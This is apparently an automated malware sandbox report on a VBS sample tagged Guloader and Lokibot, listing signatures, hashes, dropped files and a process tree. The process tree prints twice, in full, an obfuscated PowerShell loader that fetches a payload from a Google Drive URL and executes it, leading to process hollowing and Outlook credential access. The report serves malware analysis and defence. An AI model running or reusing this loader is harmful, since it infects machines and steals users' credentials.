Overview

overview

10

Static

static

1

??????????...??.vbs

windows7-x64

10

??????????...??.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-09-2024 12:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ?????????????????? (?????????????????????????.vbs

  • Size

    21KB

  • MD5

    1fda25d2ec636086e7ad9bc6cd47dad9

  • SHA1

    1508e030e55585c467534260dcb43ac50cbc88f7

  • SHA256

    d6c4f50e58d0d8f0e7d63c1efc9679beb855d6c27d0af1417c852b0f820a3ff6

  • SHA512

    aabfbf4d7086c8af67697d4db02989145ee9812cdced64d519905600f510d1a67d00d56de175209ce2602e31eeaf517cdddcb8f7f578eace29ef1d3d8c31e4ca

  • SSDEEP

    192:/8z8yaVDEgoxLcSJ7LXnlUeZFrQ8bOjQ8dNVDLu7gswBfpGHlehYk13jxcvhwGI/:NpUL3yezrQEIXV5sOxKCjxGYiVZ2cbg

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\__________________ (_________________________.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Varsledes++;$Sorbile+='subst';$Sorbile+='r';}$Sorbile+='ing';Function Kubikindholds($Snarfed){$Vvstypernes=$Snarfed.Length-$Varsledes;For( $Indklag=5;$Indklag -lt $Vvstypernes;$Indklag+=6){$Elevcentreret+=$Snarfed.$Sorbile.'Invoke'( $Indklag, $Varsledes);}$Elevcentreret;}function Unilobe($Cellulden){ . ($Launcelot) ($Cellulden);}$Unindifferent=Kubikindholds 'DaterMbeccaoIn opzBossaiContulSo orlEmb.paSpend/Lingb5Frost.Polyg0Dean Dusin(GobelWTnpksiGastrnCreatdHallio leliwMo,essJonno ReprNChionTPhyto Orth1Free,0Fras .Kicka0 ,rja;Morge MlsheW etoiD.strnCessm6Austr4s yrk;Klask Handlx,alla6 anlg4.nake;Genk A,eknrGangtvBlgen:Va.da1Preal2Rearr1 V,da.Marin0Nrreb)Subst TumulG,dhule hjemcrealmkAa,unoAc,di/ P,te2 nona0Quen,1Undsk0 Nske0Sibir1 P il0Ankyl1oo dd InfeFGollyi TomrrAguace A atfHoggeo helxUd li/Orake1Pir e2Enc p1Kalle.Snurr0Retur ';$nonmetaphoric=Kubikindholds 'Ac,tyUBu des Asiae Iterr Nons-Ub.haASeksugSpotme Ops nPho.otPensi ';$Obsternasiges=Kubikindholds 'naiv,hMuscotObta,tHonnip GudssErhol: nadu/Accr./RematdR.llerBeri iAndelvpoulteInge,.SjlekgBilafoAnatooU.ambgnattel S.yteBnkev.NonthcSvel.oAtenkm Grey/ v,ntuK nvoctaffe?Omhege Amatx RedepHypoaope.plrSp.kutUncom=CaucadOp.olo CritwL,ftfnAn,delUnfiboSkareaGenskdThank&Re,roiZi.zidBrneh=Raask1 indwBFletks VejnaSkm.ezUdtryKYucatUCagelmGrnsasTu.ta_Enerkz.onidiTrencPCan,irTax muRetsaOUnderBknstnQS.wmaBRecon2RetinTS.ilnL DsecVContrT,imhrQCanto9Dubleg Eu,oldekupnGnathPChromWFuli.W.rypvSSto.a ';$Lagorchestes=Kubikindholds 'Gldse> Ba.h ';$Launcelot=Kubikindholds 'KudskiUndiseAirinxDifte ';$Superfusion='Pensionsbeskatningers';$savanner = Kubikindholds 'FlotaeNa ivcNyklahRegaroDeict Heste%Imbeca Offip andep Se vdOmposaE,tontHol.taDadle% Natu\dlgs,DM.dtpa Sti tFde,aaTilkriAnsponCarpod pectuA,sensRustvtMalc,rkoloniGar veHjnesnstillsSmaas.HrelsH bevboFo.kem Co f I.tun&Guil,&Chape weede P,lac RanghBeefioPyro, OpanktWo.eg ';Unilobe (Kubikindholds ' Tese$tropagBid,rlunbruo Pr db KommaBefr,lOpskr: RidshScuttoC.ralvNotedeB.eddd RenttForbrrMa slaAfkapp OverpIschieB.omdrUguns= Linn(H stocSpildm SoledO lys valg/BelsicHorse Unjo$byttesDilleaSplejvS,lgsaAn.ronH.rpunAdjoueAnator Skid)Horse ');Unilobe (Kubikindholds 'frisk$SpringudmellRevi o Shitb ,icraLsrepl Bjer:AlarmSBowyacEcta.l .urreOsteorArgenobascotSterriarchccSup,re Flakc Parat BencoPeri,mMutisyIn.ru= Zal.$ b spOSk.erbPos isA,turt,ftereFedtsrMak wnovereaKapitsUhuemi Myogg OrieeVers.siniti.SammesUnlicpwoolmlAfstuiTi fat Byg.(,krsl$BestnLSawmaa U,twgGoingoD,strrPhil,c Ov.rh Jaeve.ortvsS nketLs tieSpr.csnorma)Jodel ');Unilobe (Kubikindholds 'Workw[,ordmNSmalfeUhaantWirel.RancoSArithe SprorFo.tuvIndtriInecocHalvve.nrecPSt.mno GodkiA inonPerift FiltMbrownaUnpaynGlassaAfsvogAr,hre PansrV,cuu] Batt:Godto:CharaSArboreTjanscKjartu Madorkaffei Aft.tFjermyAnecdPM,dderImp eoIntrat MalloForudcKllino UnfalStign Svarb=Lasto Regul[LooseNDismeeBek.otdi.em.BrfruStilste Legec ogikuForharCompli SteatLsbl.yMdeplPExcitrClyfjoCantet Klono AdrecUdsk oTytteldige.TSeraiy.athlpMang,eSda g]Itera:Zw.es: UnhuTStigml Hi,bs G.sp1Ordbo2Incom ');$Obsternasiges=$Scleroticectomy[0];$Speedaway= (Kubikindholds ' Prvn$Pittig.ltraltrpseoNonrebKon.raBrndel ,ntw: CompBSuperr MarkiMil,anInt.mkGennelRin.eeeyesos IrrisOensk=FircyNInscre SkrawDy sp- nanoOGalopbSude,jPhobieIntercBlan,tEpilo BrushSEffr y UblosZoo itgriseeDraabm Ma k. drivNHor.eeStamktLlebr. JuliW Motoe d,reb AdmiCm.sall FortiUndere L ckn,ndert');$Speedaway+=$hovedtrapper[1];Unilobe ($Speedaway);Unilobe (Kubikindholds ' Fls,$neokoBTusslrUagtsiTilrenPudd.kRame.lAnknyeo.ertsQui ts D kl.Uops.H ReaneRing.aTeenidKondee OrierSoldasSoves[ Bli,$Syll n tskroFam.lnDiv,dm NavieFluidtBushbafagblpVermihA.bejoTyrogrMinipiBlankcCance] Kapr=Halef$ ExraUCoum.n OroniRinken jarodOpponi SerifSociaf svaneH.emmrNevoyeberninStridtNitro ');$Grafisk=Kubikindholds 'Tryll$ PicqBSmurrr LeveiDefennjv,frk RevelHexageGrammsFarvesT,tma.NephiDBoomaoProgrw BergnDis.vl I,paoFiks,aProdsdCapenFHnsehio inilDalmae Deli( Reve$TilbjOSrilabFdestsBackbtPaab.eDagdrrniogtnEuspoa JustsForekiUkammgSupereRestisDoddl,Halvd$PenetCMess l Comparep,eyTr.gle Writr Fort)P,rib ';$Clayer=$hovedtrapper[0];Unilobe (Kubikindholds 'Lunke$SolrigTegnilalacroSnothbPredea Kronlklatp:AsparW Satuepim,daAlloppMetaloCh,linArbejsFr.tahunpo o,fspew CranicranknhousegLtapp=Urban(VoldtTG.fsteBedrasVandbt Sm.l-StrggPKloseaFa.llttripohN.nco Billi$HaffiCNephrlIntera UpstyForm.eFo.ler Fidd)sjld, ');while (!$Weaponshowing) {Unilobe (Kubikindholds ' Roqu$A,lergsereul SeisosekunbdisguaC,villnab.e:ImmutDPunktuGe.minVandtdRee.seS.rfsrCl.nohFremmeforaeaAntagdBeslu=Skov $ nwastblksprHe.eruDili eStrid ') ;Unilobe $Grafisk;Unilobe (Kubikindholds ' sta SElem.tCreataKomm,rSoldytBer g-LegalSSootyl HisteFlockelu tepBehag Houri4T,ist ');Unilobe (Kubikindholds 'Touph$ unkgJuleflSkubboVellib Nyttaop,ralEu,hl:LoxodWBew,aebedelaSubb,pFes.fo Besyn BedrsAkkorhFor,ioGoverwO.ocoiBickinPusteg Spro=Insul( lothT.ysiueHalsesNedsttTod,y-Pro iPkra.sa Spe,tDelilh Brdr Haa d$ GunsCVirksl Liv aRespiyGenn.e Tilsr dhoo) War, ') ;Unilobe (Kubikindholds 'Lettj$ un.eg ParalCent,oaleyabKo deaApri,l,kole:VelgrFP,ecooFirt,rAlimesIdeo.tSkifta,isvaemessirMeannkDhobeeM.nipdS,mone utils .pho2Afr g0T.bor6Jomfr=Lod,r$ latog SprolMaadeoUsurpbPrveraForhalEugen:DistrKBe,luoGjetonVrdigtKutt r ConfoUnsobl.ndept,yrenaB tses B.rttBlegs+Baill+Pe io%Forga$M croSSaty.cStilfl.ideoeDegenrHandeoGarnit valiiSupercgudsfe nmacLe,igt Cou o B,camSh.ovyOutre.PerficAs eroChemouFluepnAnilit amsa ') ;$Obsternasiges=$Scleroticectomy[$Forstaerkedes206];}$Ungaged=335988;$Broderligt=29831;Unilobe (Kubikindholds 'Skema$janusgGrocelUnwitoSlvs.bHaa daSpunsl Red.:PapirPGr.nia UndelemploeEtvrerTheocmRav.ro esti Stnin=Tipti MagneG Cl.ceSeemlt,ecid-.lotsCEkstroPlektnTrosktarchmeSupplnScotttK.lde Ask.t$U gifCPreswlAdactaE uesyOpbygeU derrUtthe ');Unilobe (Kubikindholds 'Buo s$ArthrgFast,l Tomlo IsawbM.gneasem plHersk:S bkoS ameite stdNigh.eStilloAbsurvExcureF,rdjr UndesO.cilkCimicrUdlgniPotstfPantutGensie InacnBistas Cuda Antip=Grosz Dulse[VerdeSSap.iyCoar.sVera tHalvfe B vemOvere. forlCParado.rotan jengv ,ndfecykelrBom.etWh.ck]Disin:Udtry:B vidFAktuarAesthoRituamBordkBKontoaE,flasPaludeBluff6 .nol4HeadbSIndtet SukkrP.mmii AsatnDomingDerac(Luxat$Om.avP DisaaCl.ssl un,eeBeskfrScytom.emipo In.u).vamp ');Unilobe (Kubikindholds 'opf.t$MemengObsculStry o klynbnelumaKursulWhiff:Subp,B,nbeteUpbartPackwa MicrlMill,bSlaglaPolypr Stbl Ident=Drikk Skogg[.ausaSMakroyTatersKristtMillaeStenbmTrito.MiddeT T.kmeSamlexSyndatMusel.SmreoEArle,nBlvrecparago,tormd StatiA,mban,attegUdebl]Fetis: Un e:SmokeAPartiSA itaCAirteIVersiI Be,r.ArmerGReosteDreidtTa seSstatitF,rhar OveriFar.onV.abegYameo(Fored$ SpejSSi,bei edtd.uldeeKevino Rheiv UphoeDiskrrOver sImplik PapirFinani,afetfI distIn.ogeS,allnMilkssBr om)Lustr ');Unilobe (Kubikindholds 'Aflev$Slettg ,stfl Ekspo VandbDrilaa SenalOmtal:AntipATabl,eRavior EvtroPolynl Bidfi,ilintSelvhhJohanoUnneglInteroElectgGrundyS,ofe=Strai$ N,nsBMatemeAcadet npanaBankelKnebebBarreaNglesr ,inm.EvangsVisc uRrlgnbHeu.gs acobt Uni.r pdyriDehy.nTransgT,lef(Gl,co$LiebhU dfrincrakog velsaBrdlsgBate,eFremsd erhv, .lin$ ynamBSe,asrEdriooSrlindmadeleHistorUf kslIncenistempgK,lletpande) Hype ');Unilobe $Aerolithology;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dataindustriens.Hom && echo t"
        3⤵
          PID:4916
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Varsledes++;$Sorbile+='subst';$Sorbile+='r';}$Sorbile+='ing';Function Kubikindholds($Snarfed){$Vvstypernes=$Snarfed.Length-$Varsledes;For( $Indklag=5;$Indklag -lt $Vvstypernes;$Indklag+=6){$Elevcentreret+=$Snarfed.$Sorbile.'Invoke'( $Indklag, $Varsledes);}$Elevcentreret;}function Unilobe($Cellulden){ . ($Launcelot) ($Cellulden);}$Unindifferent=Kubikindholds 'DaterMbeccaoIn opzBossaiContulSo orlEmb.paSpend/Lingb5Frost.Polyg0Dean Dusin(GobelWTnpksiGastrnCreatdHallio leliwMo,essJonno ReprNChionTPhyto Orth1Free,0Fras .Kicka0 ,rja;Morge MlsheW etoiD.strnCessm6Austr4s yrk;Klask Handlx,alla6 anlg4.nake;Genk A,eknrGangtvBlgen:Va.da1Preal2Rearr1 V,da.Marin0Nrreb)Subst TumulG,dhule hjemcrealmkAa,unoAc,di/ P,te2 nona0Quen,1Undsk0 Nske0Sibir1 P il0Ankyl1oo dd InfeFGollyi TomrrAguace A atfHoggeo helxUd li/Orake1Pir e2Enc p1Kalle.Snurr0Retur ';$nonmetaphoric=Kubikindholds 'Ac,tyUBu des Asiae Iterr Nons-Ub.haASeksugSpotme Ops nPho.otPensi ';$Obsternasiges=Kubikindholds 'naiv,hMuscotObta,tHonnip GudssErhol: nadu/Accr./RematdR.llerBeri iAndelvpoulteInge,.SjlekgBilafoAnatooU.ambgnattel S.yteBnkev.NonthcSvel.oAtenkm Grey/ v,ntuK nvoctaffe?Omhege Amatx RedepHypoaope.plrSp.kutUncom=CaucadOp.olo CritwL,ftfnAn,delUnfiboSkareaGenskdThank&Re,roiZi.zidBrneh=Raask1 indwBFletks VejnaSkm.ezUdtryKYucatUCagelmGrnsasTu.ta_Enerkz.onidiTrencPCan,irTax muRetsaOUnderBknstnQS.wmaBRecon2RetinTS.ilnL DsecVContrT,imhrQCanto9Dubleg Eu,oldekupnGnathPChromWFuli.W.rypvSSto.a ';$Lagorchestes=Kubikindholds 'Gldse> Ba.h ';$Launcelot=Kubikindholds 'KudskiUndiseAirinxDifte ';$Superfusion='Pensionsbeskatningers';$savanner = Kubikindholds 'FlotaeNa ivcNyklahRegaroDeict Heste%Imbeca Offip andep Se vdOmposaE,tontHol.taDadle% Natu\dlgs,DM.dtpa Sti tFde,aaTilkriAnsponCarpod pectuA,sensRustvtMalc,rkoloniGar veHjnesnstillsSmaas.HrelsH bevboFo.kem Co f I.tun&Guil,&Chape weede P,lac RanghBeefioPyro, OpanktWo.eg ';Unilobe (Kubikindholds ' Tese$tropagBid,rlunbruo Pr db KommaBefr,lOpskr: RidshScuttoC.ralvNotedeB.eddd RenttForbrrMa slaAfkapp OverpIschieB.omdrUguns= Linn(H stocSpildm SoledO lys valg/BelsicHorse Unjo$byttesDilleaSplejvS,lgsaAn.ronH.rpunAdjoueAnator Skid)Horse ');Unilobe (Kubikindholds 'frisk$SpringudmellRevi o Shitb ,icraLsrepl Bjer:AlarmSBowyacEcta.l .urreOsteorArgenobascotSterriarchccSup,re Flakc Parat BencoPeri,mMutisyIn.ru= Zal.$ b spOSk.erbPos isA,turt,ftereFedtsrMak wnovereaKapitsUhuemi Myogg OrieeVers.siniti.SammesUnlicpwoolmlAfstuiTi fat Byg.(,krsl$BestnLSawmaa U,twgGoingoD,strrPhil,c Ov.rh Jaeve.ortvsS nketLs tieSpr.csnorma)Jodel ');Unilobe (Kubikindholds 'Workw[,ordmNSmalfeUhaantWirel.RancoSArithe SprorFo.tuvIndtriInecocHalvve.nrecPSt.mno GodkiA inonPerift FiltMbrownaUnpaynGlassaAfsvogAr,hre PansrV,cuu] Batt:Godto:CharaSArboreTjanscKjartu Madorkaffei Aft.tFjermyAnecdPM,dderImp eoIntrat MalloForudcKllino UnfalStign Svarb=Lasto Regul[LooseNDismeeBek.otdi.em.BrfruStilste Legec ogikuForharCompli SteatLsbl.yMdeplPExcitrClyfjoCantet Klono AdrecUdsk oTytteldige.TSeraiy.athlpMang,eSda g]Itera:Zw.es: UnhuTStigml Hi,bs G.sp1Ordbo2Incom ');$Obsternasiges=$Scleroticectomy[0];$Speedaway= (Kubikindholds ' Prvn$Pittig.ltraltrpseoNonrebKon.raBrndel ,ntw: CompBSuperr MarkiMil,anInt.mkGennelRin.eeeyesos IrrisOensk=FircyNInscre SkrawDy sp- nanoOGalopbSude,jPhobieIntercBlan,tEpilo BrushSEffr y UblosZoo itgriseeDraabm Ma k. drivNHor.eeStamktLlebr. JuliW Motoe d,reb AdmiCm.sall FortiUndere L ckn,ndert');$Speedaway+=$hovedtrapper[1];Unilobe ($Speedaway);Unilobe (Kubikindholds ' Fls,$neokoBTusslrUagtsiTilrenPudd.kRame.lAnknyeo.ertsQui ts D kl.Uops.H ReaneRing.aTeenidKondee OrierSoldasSoves[ Bli,$Syll n tskroFam.lnDiv,dm NavieFluidtBushbafagblpVermihA.bejoTyrogrMinipiBlankcCance] Kapr=Halef$ ExraUCoum.n OroniRinken jarodOpponi SerifSociaf svaneH.emmrNevoyeberninStridtNitro ');$Grafisk=Kubikindholds 'Tryll$ PicqBSmurrr LeveiDefennjv,frk RevelHexageGrammsFarvesT,tma.NephiDBoomaoProgrw BergnDis.vl I,paoFiks,aProdsdCapenFHnsehio inilDalmae Deli( Reve$TilbjOSrilabFdestsBackbtPaab.eDagdrrniogtnEuspoa JustsForekiUkammgSupereRestisDoddl,Halvd$PenetCMess l Comparep,eyTr.gle Writr Fort)P,rib ';$Clayer=$hovedtrapper[0];Unilobe (Kubikindholds 'Lunke$SolrigTegnilalacroSnothbPredea Kronlklatp:AsparW Satuepim,daAlloppMetaloCh,linArbejsFr.tahunpo o,fspew CranicranknhousegLtapp=Urban(VoldtTG.fsteBedrasVandbt Sm.l-StrggPKloseaFa.llttripohN.nco Billi$HaffiCNephrlIntera UpstyForm.eFo.ler Fidd)sjld, ');while (!$Weaponshowing) {Unilobe (Kubikindholds ' Roqu$A,lergsereul SeisosekunbdisguaC,villnab.e:ImmutDPunktuGe.minVandtdRee.seS.rfsrCl.nohFremmeforaeaAntagdBeslu=Skov $ nwastblksprHe.eruDili eStrid ') ;Unilobe $Grafisk;Unilobe (Kubikindholds ' sta SElem.tCreataKomm,rSoldytBer g-LegalSSootyl HisteFlockelu tepBehag Houri4T,ist ');Unilobe (Kubikindholds 'Touph$ unkgJuleflSkubboVellib Nyttaop,ralEu,hl:LoxodWBew,aebedelaSubb,pFes.fo Besyn BedrsAkkorhFor,ioGoverwO.ocoiBickinPusteg Spro=Insul( lothT.ysiueHalsesNedsttTod,y-Pro iPkra.sa Spe,tDelilh Brdr Haa d$ GunsCVirksl Liv aRespiyGenn.e Tilsr dhoo) War, ') ;Unilobe (Kubikindholds 'Lettj$ un.eg ParalCent,oaleyabKo deaApri,l,kole:VelgrFP,ecooFirt,rAlimesIdeo.tSkifta,isvaemessirMeannkDhobeeM.nipdS,mone utils .pho2Afr g0T.bor6Jomfr=Lod,r$ latog SprolMaadeoUsurpbPrveraForhalEugen:DistrKBe,luoGjetonVrdigtKutt r ConfoUnsobl.ndept,yrenaB tses B.rttBlegs+Baill+Pe io%Forga$M croSSaty.cStilfl.ideoeDegenrHandeoGarnit valiiSupercgudsfe nmacLe,igt Cou o B,camSh.ovyOutre.PerficAs eroChemouFluepnAnilit amsa ') ;$Obsternasiges=$Scleroticectomy[$Forstaerkedes206];}$Ungaged=335988;$Broderligt=29831;Unilobe (Kubikindholds 'Skema$janusgGrocelUnwitoSlvs.bHaa daSpunsl Red.:PapirPGr.nia UndelemploeEtvrerTheocmRav.ro esti Stnin=Tipti MagneG Cl.ceSeemlt,ecid-.lotsCEkstroPlektnTrosktarchmeSupplnScotttK.lde Ask.t$U gifCPreswlAdactaE uesyOpbygeU derrUtthe ');Unilobe (Kubikindholds 'Buo s$ArthrgFast,l Tomlo IsawbM.gneasem plHersk:S bkoS ameite stdNigh.eStilloAbsurvExcureF,rdjr UndesO.cilkCimicrUdlgniPotstfPantutGensie InacnBistas Cuda Antip=Grosz Dulse[VerdeSSap.iyCoar.sVera tHalvfe B vemOvere. forlCParado.rotan jengv ,ndfecykelrBom.etWh.ck]Disin:Udtry:B vidFAktuarAesthoRituamBordkBKontoaE,flasPaludeBluff6 .nol4HeadbSIndtet SukkrP.mmii AsatnDomingDerac(Luxat$Om.avP DisaaCl.ssl un,eeBeskfrScytom.emipo In.u).vamp ');Unilobe (Kubikindholds 'opf.t$MemengObsculStry o klynbnelumaKursulWhiff:Subp,B,nbeteUpbartPackwa MicrlMill,bSlaglaPolypr Stbl Ident=Drikk Skogg[.ausaSMakroyTatersKristtMillaeStenbmTrito.MiddeT T.kmeSamlexSyndatMusel.SmreoEArle,nBlvrecparago,tormd StatiA,mban,attegUdebl]Fetis: Un e:SmokeAPartiSA itaCAirteIVersiI Be,r.ArmerGReosteDreidtTa seSstatitF,rhar OveriFar.onV.abegYameo(Fored$ SpejSSi,bei edtd.uldeeKevino Rheiv UphoeDiskrrOver sImplik PapirFinani,afetfI distIn.ogeS,allnMilkssBr om)Lustr ');Unilobe (Kubikindholds 'Aflev$Slettg ,stfl Ekspo VandbDrilaa SenalOmtal:AntipATabl,eRavior EvtroPolynl Bidfi,ilintSelvhhJohanoUnneglInteroElectgGrundyS,ofe=Strai$ N,nsBMatemeAcadet npanaBankelKnebebBarreaNglesr ,inm.EvangsVisc uRrlgnbHeu.gs acobt Uni.r pdyriDehy.nTransgT,lef(Gl,co$LiebhU dfrincrakog velsaBrdlsgBate,eFremsd erhv, .lin$ ynamBSe,asrEdriooSrlindmadeleHistorUf kslIncenistempgK,lletpande) Hype ');Unilobe $Aerolithology;"
          3⤵
          • Network Service Discovery
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dataindustriens.Hom && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3744
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
              PID:4536
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:1440
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                  PID:4972
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  4⤵
                    PID:3664
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe"
                    4⤵
                      PID:2552
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe"
                      4⤵
                        PID:4208
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe"
                        4⤵
                          PID:3136
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          4⤵
                            PID:620
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe"
                            4⤵
                              PID:2988
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              4⤵
                                PID:3168
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe"
                                4⤵
                                  PID:4384
                                • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                  "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                  4⤵
                                  • Accesses Microsoft Outlook profiles
                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  • outlook_office_path
                                  • outlook_win_path
                                  PID:3900

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltin3rkl.g0h.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Dataindustriens.Hom
                            Filesize

                            476KB

                            MD5

                            a12f1e6450070a7f2881a51263cdfc64

                            SHA1

                            8079638e5132fc2af18b10559606f0771695c9fa

                            SHA256

                            c3e31b916fcd5901033734d674d401d6b986d80806969cdd9a9ae0faafcaa389

                            SHA512

                            4a35b4166e1f29b078a64745f6f8684234d17d46708556f83e60d2b010c8b8686cd058cd95e630723e8e28f18962e0aefb5bdf1552e3281ed1ee2708158caf8b

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2718105630-359604950-2820636825-1000\0f5007522459c86e95ffcc62f32308f1_32404286-a0b5-4a93-9620-6f13fd83251a
                            Filesize

                            46B

                            MD5

                            c07225d4e7d01d31042965f048728a0a

                            SHA1

                            69d70b340fd9f44c89adb9a2278df84faa9906b7

                            SHA256

                            8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

                            SHA512

                            23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2718105630-359604950-2820636825-1000\0f5007522459c86e95ffcc62f32308f1_32404286-a0b5-4a93-9620-6f13fd83251a
                            Filesize

                            46B

                            MD5

                            d898504a722bff1524134c6ab6a5eaa5

                            SHA1

                            e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

                            SHA256

                            878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

                            SHA512

                            26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

                            Download Submit

                          • memory/1944-37-0x00000000079C0000-0x0000000007A56000-memory.dmp

                            Filesize

                            600KB

                            Download

                          • memory/1944-39-0x0000000008770000-0x0000000008D14000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/1944-41-0x0000000008D20000-0x000000000D384000-memory.dmp

                            Filesize

                            70.4MB

                            Download

                          • memory/1944-17-0x0000000002E60000-0x0000000002E96000-memory.dmp

                            Filesize

                            216KB

                            Download

                          • memory/1944-18-0x0000000005910000-0x0000000005F38000-memory.dmp

                            Filesize

                            6.2MB

                            Download

                          • memory/1944-19-0x0000000005880000-0x00000000058A2000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/1944-20-0x0000000005FB0000-0x0000000006016000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/1944-21-0x0000000006020000-0x0000000006086000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/1944-31-0x0000000006110000-0x0000000006464000-memory.dmp

                            Filesize

                            3.3MB

                            Download

                          • memory/1944-32-0x0000000006760000-0x000000000677E000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/1944-33-0x0000000006790000-0x00000000067DC000-memory.dmp

                            Filesize

                            304KB

                            Download

                          • memory/1944-38-0x0000000007970000-0x0000000007992000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/1944-35-0x00000000080F0000-0x000000000876A000-memory.dmp

                            Filesize

                            6.5MB

                            Download

                          • memory/1944-36-0x0000000007890000-0x00000000078AA000-memory.dmp

                            Filesize

                            104KB

                            Download

                          • memory/2780-0-0x00007FF959ED3000-0x00007FF959ED5000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/2780-34-0x00007FF959ED0000-0x00007FF95A991000-memory.dmp

                            Filesize

                            10.8MB

                            Download

